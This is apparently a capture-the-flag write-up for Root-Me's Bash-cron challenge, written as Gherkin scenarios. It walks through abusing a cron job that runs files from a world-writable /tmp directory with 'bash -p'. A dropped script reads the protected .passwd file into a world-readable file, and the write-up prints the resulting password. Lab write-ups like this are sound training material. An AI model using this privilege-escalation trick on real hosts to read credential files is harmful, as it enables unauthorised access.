## Version 2.0
## language: en

Feature:
  Site:
    www.root-me.org
  Category:
    bash
    scripting
  User:
    karlhanso82
  Goal:
    Get the user password from
    a restricted enviroment

 Background:
   Hacker's software:
     | <Software name> | <Version>    |
     | Windows OS      | 10           |
     | Chromium        | 74.0.3729.131|

 Machine information:
   Given the challenge URL
   """
   https://www.root-me.org/es/Challenges/App-Script/Bash-cron
   """
   Then I open the url with Chromium
   And I see that I have to enter to a machine via webssh
   Then an input box asking for a password
   And I open the webssh link
   Then I see some info
   """
   ----------------

   Welcome on challenge02    /

   -----------------------------‘

   /tmp and /var/tmp are writeable
   """
   And I see two files ch4  cron.d
   Then I came to the conclusion that
   Given the information above I must search the password

 Scenario: Failed Attempt
   When I inspec the code from ch4 file it show me a crontab
   Then I decide to write a sh file in /challenge/app-script/ch4
   And it gives me an permision denied error
   Then I decide to look for more information

Scenario: Success:getting the password
  Given the code from ch4 file
  """
  if [ ! -e "/tmp/._cron" ]; then
    mkdir -m 733 "/tmp/._cron"
  fi
  ls -1a "${wdir}" | while read task; do
    if [ -f "${wdir}${task}" -a -x "${wdir}${task}" ]; then
        timelimit -q -s9 -S9 -t 5 bash -p "${PWD}/${wdir}${task}"
    fi
    rm -f "${PWD}/${wdir}${task}"
  done
  """
  Then I realise that the sh script runs every minute
  And it runs task in /tmp/.cron folder
  And bash -p run this task keeping the user permisions
  Then I decide to create a file
  """
  touch /tmp/sol && chmod 777 /tmp/sol
  """
  Then I edit this file with this code
  """
  #!/bin/bash
  /bin/cat /challenge/app-script/ch4/.passwd > /tmp/sol;
  /bin/chmod 777 /tmp/sol
  """
  And it runs cat and with redirect it writes the password in the sol file
  Then I save this file and move to
  """
  mv /tmp/sol /tmp/._cron/homework
  """
  And since the crontab runs every minute
  Then we get the password Vys3OS3iStUapDj in the sol file
  And it solves the challenge
